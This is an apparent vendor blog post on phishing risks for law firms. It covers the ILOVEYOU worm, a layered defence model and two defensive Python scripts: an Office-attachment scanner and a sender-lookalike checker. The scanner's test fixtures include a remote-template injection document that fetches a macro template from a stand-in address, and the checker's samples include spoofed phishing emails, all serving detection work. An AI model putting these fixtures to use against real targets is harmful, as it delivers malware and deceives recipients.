Social engineering takes many forms. One of the earliest mass-mailing worms, known as ‘Love Letter’ (the ILOVEYOU worm of 2000), spread through a malicious email attachment. A potential victim received an email, usually from someone they knew, inviting them to open a ‘love letter’ attached as a file. The attachment was a script: once run, it mailed copies of itself to everyone in the victim’s address book, tried to steal passwords from the infected computer, and overwrote many of the user’s files with copies of itself.
Because the sender was ‘familiar’ and few people yet looked closely at file types (the script hid behind a name that looked like a harmless text file), a truly absurd number of devices became infected this way. Estimates place it at well over a million. That’s over a million devices that had files overwritten and passwords exposed.
That is to say, it’s a scam that a great many people have fallen for and will continue to fall for, because it bypasses the warning signs most people are trained to look for. It wasn’t a typical phishing scam: the English was decent, without typos, and it came from someone the recipient likely knew well enough to recognize the address. The file itself, and maybe an uncharacteristic tone at a time when ‘email etiquette’ was still being worked out, were the only flags that something was off. Even once someone realized what had happened, they might not remember everyone in their contact list, or the list might be too large to warn everyone before the copies went out, and so the chain grew longer.
Offices that routinely receive emails with documents attached from outside contacts, like law offices, are especially exposed to this particular scam.
Ways to Protect Against It
The problem with phishing is that even trained employees become fatigued and stop noticing the subtle red flags of a stolen or lookalike address or an unexpected file type, especially if they regularly handle every sort of file imaginable while compiling the paperwork their job requires. Worse, ordinary documents are now a regular threat too. The X in .docx and .xlsx stands for XML, not for executable, and those formats cannot carry macros on their own; their macro-enabled siblings (.docm, .xlsm) can, and even a plain .docx or .xlsx can hold an embedded object or an external reference (for example a remote template that Office fetches when the file is opened) that pulls in a payload. Such a document is not malware itself, but it opens the door to malware by running code or triggering a download from a link.
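The point above can be checked mechanically, because an Office Open XML file is just a zip archive and everything that turns a ‘document’ into a dropper is visible as a part or a relationship inside it. The following Python script is an added example (not the page’s code and not from any product mentioned on this page): it opens an attachment as a zip, looks for a VBA project, a macro-enabled content type, embedded OLE objects and external relationships such as a remote attached template, and returns a gateway-style verdict. The three sample packages are constructed inline, the quarantine/review/pass policy is an assumption, and the template address 203.0.113.5 is a documentation address, not a real server.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def scan_ooxml(data: bytes) -> dict:
    """Inspect an Office Open XML package (.docx/.xlsx/.docm/...) without opening it in Office.

    Things that let a document behave like a program show up as zip parts or relationships:
      - a vbaProject.bin part holds VBA macros
      - a macroEnabled content type tells Office to treat the file as .docm/.xlsm
      - parts under embeddings/ are embedded OLE objects (a packaged .exe, .js, ...)
      - relationships with TargetMode="External" point outside the file, e.g. an
        attachedTemplate that Word fetches from a web server when the document opens
    """
    findings = {"vba": [], "macro_enabled": False, "embedded": [], "external": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        for name in names:
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):
                findings["vba"].append(name)
            if "/embeddings/" in lower:
                findings["embedded"].append(name)
            if lower.endswith(".rels"):
                root = ET.fromstring(zf.read(name))
                for rel in root.iter(RELS_NS + "Relationship"):
                    if rel.get("TargetMode") == "External":
                        rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                        findings["external"].append((name, rel_type, rel.get("Target")))
        if "[Content_Types].xml" in names:
            content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            findings["macro_enabled"] = "macroEnabled" in content_types
    return findings


def verdict(findings: dict) -> str:
    """Map findings to a mail-gateway decision. The policy here is an assumption for the example."""
    if findings["vba"] or findings["macro_enabled"]:
        return "quarantine"
    # Ordinary hyperlinks are external relationships too and are normal; anything else
    # pointing outside the file (remote template, external OLE link) deserves a look.
    unusual_external = [e for e in findings["external"] if e[1] != "hyperlink"]
    if findings["embedded"] or unusual_external:
        return "review"
    return "pass"


def build_package(parts: dict) -> bytes:
    """Assemble a minimal OOXML-style zip from {part name: content}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed sample packages (minimal, not produced by Word).
CLEAN_PARTS = {
    "[Content_Types].xml": (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        "</Types>"
    ),
    "_rels/.rels": (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
        "</Relationships>"
    ),
    "word/document.xml": (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>Draft agreement</w:t></w:r></w:p></w:body></w:document>"
    ),
}
# A remote attached template: the document looks like a plain .docx but fetches code on open.
REMOTE_TEMPLATE_RELS = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="http://203.0.113.5/template.dotm" TargetMode="External"/>'
    "</Relationships>"
)
OLE_HEADER = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # compound-file signature; the rest is stubbed

CLEAN_DOCX = build_package(CLEAN_PARTS)
TEMPLATE_INJECTION_DOCX = build_package({**CLEAN_PARTS, "word/_rels/settings.xml.rels": REMOTE_TEMPLATE_RELS})
MACRO_DOCM = build_package({
    **CLEAN_PARTS,
    "[Content_Types].xml": CLEAN_PARTS["[Content_Types].xml"].replace(
        "vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
        "vnd.ms-word.document.macroEnabled.main+xml",
    ),
    "word/vbaProject.bin": OLE_HEADER + b"\x00" * 8,
    "word/embeddings/oleObject1.bin": OLE_HEADER,
})

if __name__ == "__main__":
    for label, pkg in [("clean", CLEAN_DOCX), ("remote template", TEMPLATE_INJECTION_DOCX), ("macro", MACRO_DOCM)]:
        result = scan_ooxml(pkg)
        print(f"{label:16s} -> {verdict(result)} {result}")
```

The check deliberately ignores the file extension: a .docm renamed to .docx still contains vbaProject.bin, and a remote template reference lives in the package regardless of what the attachment is called. It does not parse the VBA or follow the external target; it only decides whether a human or a sandbox should see the file before the employee does.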
Can training really stop this?
The old advice was that scammers misspell words and make their emails look bad on purpose, because it weeds out from the start the people who would eventually figure out the scheme. Those scams still exist, but they are not what people targeting law firms are using. Instead, a combination of more refined tactics is usually in play: the attacker has a specific target and doesn’t want them getting away. A well-written phishing email that still uses the standard pressure tactics (there’s a rush, you’re in trouble, etc.) can slip past without raising any red flags at all.
Spearphishing is another tactic. Where regular phishing is written vaguely enough that a single dynamic field (a name, a company) is all that’s needed before sending it to thousands of people, a spearphishing email is highly personalized, and data compromised elsewhere is put to use in it. An email that is almost right, with contact information that is completely right, and a footer or signature line that matches exactly what that person normally uses, is much tougher to spot than the average phishing email. The scammer who sent it knows what the recipient is expecting and has put in substantial effort to match it.
It’s the difference between dragging a net and fishing with a baited hook. Scammers know the net will get them a lot of sardines, but if they want the big tuna, they have to pull out all the stops. Law firms are a big tuna: the data is valuable, and losing it has serious consequences.
The Swiss Cheese Model
Regular refresher training and support software (think of programs like Ironscales, which pull phishing attempts out of the inbox and flag concerning messages) help prevent failures caused by human error or by a truly convincing phishing message. This follows the ‘Swiss Cheese’ model borrowed from safety engineering: independent layers of defense stack like slices of Swiss cheese, and although every slice has holes, a threat only gets through if the holes in every layer line up.
Say an employee gets an email. It’s a phishing email, but the employee doesn’t know that: it’s disguised too well for them to notice. They open it, and at this point a program like Ironscales might warn them that this is the first time they’ve received mail from this address. They take a closer look, realize the address is a lookalike of someone else’s, and delete it.
However, that warning won’t fire if the address was stolen rather than imitated, because a compromised account is a valid, previously seen sender. Assuming the person whose account was stolen isn’t able to warn ahead, the employee opens the email, reads it, and finds nothing wrong. They go to download the attachment, and it’s flagged by the antivirus built into Windows, which recognizes it because its signatures are up to date.
Well, what if that doesn’t stop them? What if the attacker sent a document that carries no known signature, or the employee clicked ‘download anyway’? That would be bad: a malicious file is now on the computer. However, a sufficiently advanced endpoint product layered on top of the Microsoft antivirus can isolate a malicious file by its behavior rather than its appearance, the moment it tries to do something a document shouldn’t.
Well, say the malicious file wasn’t isolated because there was no product capable of doing that. The fallback is recovery: a sturdy, tested backup system that lets the computer be fully wiped and restored while losing less than a week’s worth of data, combined with cyber insurance, because malicious files today rarely just lock data up; they usually steal a copy for resale elsewhere, so your clients’ data may already be gone even after the machine is restored.
There are several points where all but the most determined employee will be prompted to stop, analyze what they’re looking at, consider whether the file or email could be fraudulent, and remove it from their inbox. Behind those, several automated systems are tasked with identifying and isolating the threat. That is the Swiss Cheese model!
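The first slice in the scenario above, the ‘first time we’ve seen this sender’ warning, and the hole in it, a stolen account that passes every sender check, can both be shown with a small sender-assessment routine. The following Python code is an added example (not the page’s code and not how Ironscales or Microsoft implement their checks): it compares the From header of an incoming message against a directory of known correspondents and flags first-contact senders, display-name impersonation, lookalike domains (within a small edit distance of a known domain) and a Reply-To that points somewhere other than the From domain. The contact directory and the four sample messages are constructed for the example.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed directory of correspondents the firm has exchanged mail with (assumption).
KNOWN_CONTACTS = {
    "jane@partnerfirm.example": "Jane Doe",
    "clerk@courts.example": "County Clerk",
}
KNOWN_DOMAINS = {addr.split("@", 1)[1] for addr in KNOWN_CONTACTS}
KNOWN_NAMES = {name.lower(): addr for addr, name in KNOWN_CONTACTS.items()}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; 'partnerfirrn' vs 'partnerfirm' is 2, which is what lookalikes rely on."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_sender(raw_message: str) -> list:
    """Return the sender-level warnings a mailbox add-on could show for this message."""
    msg = message_from_string(raw_message)
    name, addr = parseaddr(msg.get("From", ""))
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[-1]
    flags = []

    # Slice 1: have we ever received mail from exactly this address?
    if addr not in KNOWN_CONTACTS:
        flags.append("first-contact")

    # Slice 2: the display name belongs to a known contact but the address does not.
    known_addr = KNOWN_NAMES.get(name.lower())
    if known_addr and known_addr != addr:
        flags.append(f"display-name-impersonation:{known_addr}")

    # Slice 3: the domain is a near-miss of a domain we already trust.
    if domain not in KNOWN_DOMAINS:
        for known_domain in sorted(KNOWN_DOMAINS):
            if edit_distance(domain, known_domain) <= 2:
                flags.append(f"lookalike-domain:{known_domain}")

    # Slice 4: replies would go somewhere other than the apparent sender.
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and reply_to.lower().rsplit("@", 1)[-1] != domain:
        flags.append("reply-to-domain-mismatch")
    return flags


# Constructed sample messages.
LEGIT = """From: Jane Doe <jane@partnerfirm.example>
Subject: Draft agreement

Attached as discussed.
"""
LOOKALIKE = """From: Jane Doe <jane@partnerfirrn.example>
Subject: Draft agreement

Please open the attached revision today.
"""
REPLY_TO_SWAP = """From: Jane Doe <jane@partnerfirm.example>
Reply-To: jane.doe@mail-relay.example
Subject: Draft agreement

Reply with the signed copy.
"""
# The stolen-account case from the scenario: every sender check passes.
STOLEN_ACCOUNT = """From: Jane Doe <jane@partnerfirm.example>
Subject: Draft agreement

Please open the attached revision today.
"""

if __name__ == "__main__":
    for label, sample in [("legit", LEGIT), ("lookalike", LOOKALIKE),
                          ("reply-to swap", REPLY_TO_SWAP), ("stolen account", STOLEN_ACCOUNT)]:
        print(f"{label:15s} -> {assess_sender(sample) or 'no sender warnings'}")
```

The last sample is the important one: a message sent from a genuinely compromised mailbox produces no sender warnings at all, which is exactly why the attachment scanning, endpoint behavior monitoring and backups in the later slices have to exist.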
We Can Help
If this seems daunting, it doesn’t have to be. Setting up a Swiss Cheese or layered model of security can be difficult, but we’re here to help! We sell enterprise security software and monitor the alerts it raises when potentially risky files are accessed or suspicious activity is detected. We sell mailbox protection, and can manage Microsoft mail rules to block or allow particular addresses as needed. We also offer training on top of enterprise anti-phishing software so employees have the best possible chance of preventing a malware event that starts with phishing.
Many businesses don’t invest in prevention; they start looking for a cure after an event has already happened, and by then it’s too late. Data can be copied endlessly, so once it’s stolen it’s as good as everywhere, and without a backup, ransomware can wipe out years of work. If you’re worried about your law firm being hit by malware, now is as good a time as any to contact us about keeping your data as secure as possible.

